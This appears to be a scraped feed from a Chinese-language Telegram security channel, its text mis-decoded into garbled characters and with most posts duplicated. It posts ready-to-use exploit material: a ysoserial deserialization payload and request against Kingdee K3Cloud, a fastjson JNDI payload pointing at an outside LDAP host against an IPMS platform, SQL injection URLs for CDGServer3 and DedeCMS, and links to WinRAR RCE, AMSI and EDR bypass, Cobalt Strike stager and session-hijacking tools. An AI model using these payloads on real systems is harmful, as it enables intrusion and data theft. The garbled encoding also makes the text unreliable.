้่ถไบRCEๆผๆด poc
ๅฝฑๅๅนณๅฐ
6.x --> 6.2.1012.4
7.x --> 7.0.352.16ใ7.7.0.202111
8.x --> 8.0.0.202205ใ8.1.0.20221110
็ๆๅๅบๅๅpayload๏ผ
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip
{"ap0":"payload ๆฐๅผ","format":"3"}
ๅฝฑๅๅนณๅฐ
6.x --> 6.2.1012.4
7.x --> 7.0.352.16ใ7.7.0.202111
8.x --> 8.0.0.202205ใ8.1.0.20221110
็ๆๅๅบๅๅpayload๏ผ
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"
POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip
{"ap0":"payload ๆฐๅผ","format":"3"}
๐5โค1
winrar ไปฃ็ ๆง่ก๏ผ้ๅธธ็ฎๅ็ไธ้ฎๅฉ็จๅทฅๅ
ท
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
https://github.com/ignis-sec/CVE-2023-38831-RaRCE
GitHub
GitHub - ignis-sec/CVE-2023-38831-RaRCE: An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831โฆ
An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831, WinRAR RCE before versions 6.23 - ignis-sec/CVE-2023-38831-RaRCE
๐4โค1
amsi ๆๆฐ็ป่ฟๆนๆณ
Windows ่ฟ็จ่ฐ่ฏๅจๆบๅถ็ป่ฟ AMSI ็ๅฆไธ็งๆนๆณ
https://github.com/MzHmO/DebugAmsi
Windows ่ฟ็จ่ฐ่ฏๅจๆบๅถ็ป่ฟ AMSI ็ๅฆไธ็งๆนๆณ
https://github.com/MzHmO/DebugAmsi
GitHub
GitHub - MzHmO/DebugAmsi: DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.
DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism. - MzHmO/DebugAmsi
โค1
(CVE-2023-2317) ๅบไบ Typora DOM ็่ทจ็ซ็น่ๆฌๅฏผ่ด่ฟ็จไปฃ็ ๆง่ก
Typora ๆฏไธๆฌพๆต่ก็่ทจๅนณๅฐ Markdown ็ผ่พๅจ๏ผๅ ่ฎธ็จๆทๅๅปบๅ็ผ่พๅ ทๆๅฎๆถ้ข่งๅ่ฝ็ Markdown ๆไปถ
https://starlabs.sg/advisories/23/23-2317/
Typora ๆฏไธๆฌพๆต่ก็่ทจๅนณๅฐ Markdown ็ผ่พๅจ๏ผๅ ่ฎธ็จๆทๅๅปบๅ็ผ่พๅ ทๆๅฎๆถ้ข่งๅ่ฝ็ Markdown ๆไปถ
https://starlabs.sg/advisories/23/23-2317/
STAR Labs
(CVE-2023-2317) Typora DOM-Based Cross-site Scripting leading to Remote Code Execution
Summary: Product Typora Vendor Typora Severity High Affected Versions Typora for Windows/Linux < 1.6.7 Tested Versions Typora for Windows 1.5.12, Typora for Linux 1.5.10 CVE Identifier CVE-2023-2317 CVE Description DOM-based XSS in updater/update.htmlโฆ
๐5โค2
Media is too big
VIEW IN TELEGRAM
AWS S3 httpๅผๆญฅ็ผๅญไธญๆฏPOC
ๅคงๅๆบๆ
งๅญๅบ็ปผๅ็ฎก็ๅนณๅฐ ipms ่ฟ็จไปฃ็ ๆง่กๆผๆด POC
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
POST /ipms/barpay/pay HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cmd: id
Content-Type: application/json
Accept-Encoding: gzip
Content-Length: 104
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://xxxxx/Basic/TomcatEcho", "autoCommit": true}
โค1
ไบฟๅก้ update.jsp sql ๆณจๅ
ฅๆผๆด POC
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--
GET http://1ip:port/CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20D ELAY%20%270:0:2%27--
๐1
้ๅฏน Docker ๅญๅจ็ๅจ่ๆผๆด่ฟ่ก็ๆด็็ฌ่ฎฐ
https://github.com/Antonlovesdnb/DockerDetectionNotes
https://github.com/Antonlovesdnb/DockerDetectionNotes
GitHub
GitHub - Antonlovesdnb/DockerDetectionNotes: Some of my rough notes for Docker threat detection
Some of my rough notes for Docker threat detection - Antonlovesdnb/DockerDetectionNotes
๐4โค1
#็ฆๅฉ #ๅทฅๅ
ท
https://github.com/tonikelope/megabasterd
่ฟ็ฉๆๅฏไปฅ็ป่ฟmega็ฝ็็ไธ่ฝฝ้ๅถ
https://github.com/tonikelope/megabasterd
่ฟ็ฉๆๅฏไปฅ็ป่ฟmega็ฝ็็ไธ่ฝฝ้ๅถ
GitHub
GitHub - tonikelope/megabasterd: Yet another unofficial (and ugly) cross-platform MEGA downloader/uploader/streaming suite.
Yet another unofficial (and ugly) cross-platform MEGA downloader/uploader/streaming suite. - tonikelope/megabasterd
๐2โค1
Forwarded from ่ธนๅๅ
ฌๅฏ
ไธไธช Pwn ไป 0 ๅฐ 0.1 ็่ชๅญฆๆๅ
Assembly-Language ๆฑ็ผ่ฏญ่จ
Reverse-Engineering ้ๅๅทฅ็จ
PWN Tools ๅๆๅทฅๅ ท
PWN You-just-got-pwned!
Reverse Tools ๅๆๅทฅๅ ท
Angr CTF ๅๅ ถ WriteUp
้พๆฅ๏ผhttps://pan.quark.cn/s/7a7b26010e18
Assembly-Language ๆฑ็ผ่ฏญ่จ
Reverse-Engineering ้ๅๅทฅ็จ
PWN Tools ๅๆๅทฅๅ ท
PWN You-just-got-pwned!
Reverse Tools ๅๆๅทฅๅ ท
Angr CTF ๅๅ ถ WriteUp
้พๆฅ๏ผhttps://pan.quark.cn/s/7a7b26010e18
pan.quark.cn
ๅคธๅ
็ฝ็ๅไบซ
ๅคธๅ
็ฝ็ๆฏๅคธๅ
ๆจๅบ็ไธๆฌพไบๆๅกไบงๅ๏ผๅ่ฝๅ
ๆฌไบๅญๅจใ้ซๆธ
็ๅงใๆไปถๅจ็บฟ่งฃๅใPDFไธ้ฎ่ฝฌๆข็ญใ้่ฟๅคธๅ
็ฝ็ๅฏ้ๆถ้ๅฐ็ฎก็ๅไฝฟ็จ็
ง็ใๆๆกฃใๆๆบ่ตๆ๏ผ็ฎๅๆฏๆAndroidใiOSใPCใiPadใ
่ฟท่ซๅคงๅญฆ็vsไปๆฅ็พไธ้ปไบงๅคดๅญ
๐28๐คก2โค1
ไผ่ฏๅซๆ ๅ
่ฎธ้่ฟๆณจๅ
ฅๆถๆ JavaScript ไปฃ็ ๆฅๅซๆ็จๆทไผ่ฏ็ๅทฅๅ
ทใ
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
GitHub
GitHub - doyensec/Session-Hijacking-Visual-Exploitation: Session Hijacking Visual Exploitation
Session Hijacking Visual Exploitation. Contribute to doyensec/Session-Hijacking-Visual-Exploitation development by creating an account on GitHub.
โค1
ๆ ๆไปถ่ฝๅฐๆง่ก็ 17 ็งๆนๆณใ
https://github.com/RedXRanger/StageStrike
https://github.com/RedXRanger/StageStrike
GitHub
GitHub - RedXRanger/StageStrike: Custom Cobalt Strike stagers using different methods of thread execution and memory allocation
Custom Cobalt Strike stagers using different methods of thread execution and memory allocation - RedXRanger/StageStrike
โค3๐1
DEF CON 31ไธญๆๅบ็ContainYourself็ ็ฉถ็POC๏ผๅฎๆปฅ็จWindowsๅฎนๅจๆกๆถๆฅ็ป่ฟEDR
https://github.com/deepinstinct/ContainYourself
https://github.com/deepinstinct/ContainYourself
GitHub
GitHub - deepinstinct/ContainYourself: A PoC of the ContainYourself research presented in DEFCON 31, which abuses the Windows containersโฆ
A PoC of the ContainYourself research presented in DEFCON 31, which abuses the Windows containers framework to bypass EDRs. - deepinstinct/ContainYourself
โค1๐1
Dedecms ็ปๆขฆ sql ๆณจๅ
ฅ POC
DedeCMS 5.7.110 ไธญๅ็ฐไบไธไธชไธฅ้ๆผๆดใๆญคๆผๆดๅฝฑๅๆไปถ/uploads/tags.php ็ๆช็ฅไปฃ็ ใๅฏนๅๆฐ tag_alias ็ๆไฝไผๅฏผ่ด sql ๆณจๅ ฅใ
sqlmap.py -u "http://โฆโฆ/tags.php?QUERY_STRING=/alias/bbb*" -dbs --batch
DedeCMS 5.7.110 ไธญๅ็ฐไบไธไธชไธฅ้ๆผๆดใๆญคๆผๆดๅฝฑๅๆไปถ/uploads/tags.php ็ๆช็ฅไปฃ็ ใๅฏนๅๆฐ tag_alias ็ๆไฝไผๅฏผ่ด sql ๆณจๅ ฅใ
sqlmap.py -u "http://โฆโฆ/tags.php?QUERY_STRING=/alias/bbb*" -dbs --batch
๐1
Forwarded from ่ธนๅๅ
ฌๅฏ
โค4๐3